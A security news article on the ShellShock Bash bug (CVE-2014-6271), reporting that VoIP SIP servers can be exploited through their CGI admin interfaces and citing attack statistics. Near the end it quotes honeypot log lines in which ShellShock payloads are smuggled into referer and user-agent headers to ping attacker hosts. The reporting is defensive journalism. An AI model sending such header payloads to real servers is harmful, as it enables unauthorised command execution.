U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|
Advertisement

Ad Placeholder

Full Width × 90

Hacking

ShellShock could be used to hack VoIP systems

Jaime Blasco at AlienVault Labs explained that ShellShock vulnerability could be  exploited to hack Voice over IP systems worldwide. The Shellshock Bash is monopolizing the debate on the Internet security in these days, every vendor is assessing its product to verify the impact of the critical vulnerability Bash Bug (CVE-2014-6271). Apple recently announced that its Mac OS X based […]

ShellShock could be used to hack VoIP systems

Jaime Blasco at AlienVault Labs explained that ShellShock vulnerability could be  exploited to hack Voice over IP systems worldwide.

The Shellshock Bash is monopolizing the debate on the Internet security in these days, every vendor is assessing its product to verify the impact of the critical vulnerability Bash Bug (CVE-2014-6271). Apple recently announced that its Mac OS X based computers are safe by default meanwhile Oracle announced that at least 32 of its solutions are affected.

As I explained several times, the impact of Shellshock Bash is really serious, an impressive amount of devices and service run vulnerable software that are not easy to update, let’s think, for example to IoT devices or voice-over-IP (VoIP) phone systems.

Today we will talk about the exposure of VOIP systems to the Shellshock Bash, compromising these systems threat actors could access to business communication systems with serious repercussion for enterprise security.

The Shellshock Bash bug affects also VoIP phone vendor’s session initiation protocol (SIP) server as revealed by the director of AlienVault Labs, Jaime Blasco, and as usually happen the flaw is likely widespread because many vendors use similar architectures.

“I’m pretty sure that there are a bunch of them (vendors), if not a lot of them, that you can exploit,” Blasco said declining to name the vendor.

The main component of VoIP systems is the SIP server, which often runs on Unix or Linux, another critical component is such architecture is the media server. While the media server implements media management functionalities, such as the transmission of the audio, the VoIP server is typically used to manage users’ configuration and phone hardware managements.

shellshock-command-diagram-600px

Unfortunately a large number of SIP servers run GNU BASH which is affected by the Shellshock vulnerability, this means that an attacker could exploit it to execute malicious commands by sending them via the Common Gateway Interfaceof the SIP server’s administrative interface.

“Even if you don’t have the username and password (for the SIP server), you can exploit the vulnerability,” Blasco said.

The possibility for at attacker are different, threat actors could exploit the Shellshock flaw to change the configuration of the VoIP systems, to add and remove new users and hardware to the system, or to serve a malware to the SIP server and gain access to a company network.

The attacks to VoIP systems are very common, phone systems are privileged targets for hackers that intend to spy on communications of the targeted organization.

The disclosure of the Shellshock flaw has triggered a series of attacks on a large scale, security researchers reported that bad actors were trying to exploit Bash Bug flaw worldwide.

Security firm Incapsula reported that in a 12-hour period, its systems recorded 725 attacks, originated from 400 unique IP addresses mainly located in US and China,  per hour against a total of 1,800 domains.

“This is pretty high for a single vulnerability,” Tim Matthews, vice president of marketing at Incapsula, said.

Typically attackers run scanning of the entire Internet to identify vulnerable machines and run the exploits, their purpose is compromise targeted machines to recruit in botnet.

Experts at AlienVault are running a new module in their honeypots to track the attempts exploiting the ShellShock bug, in just 24 hours they detected several hits.

The majority of attacks is scanning the Internet simple sending a ping command back to the attacker’s machine:

209.126.230.72 - - [25/Sep/2014 05:14:12] "GET / HTTP/1.0" 200 -
referer, () { :; }; ping -c 11 209.126.230.74
122.226.223.69 - - [25/Sep/2014 06:56:03] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 200
89.207.135.125 - - [25/Sep/2014 07:23:43] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200
user-agent, () { :;}; /bin/ping -c 1 198.101.206.138

The experts also detected two attackers that are exploiting the ShellShock flaw to serve and install two different pieces of malware on the victims and it is just the beginning!

Pierluigi Paganini

(Security Affairs – ShellShock, Linux)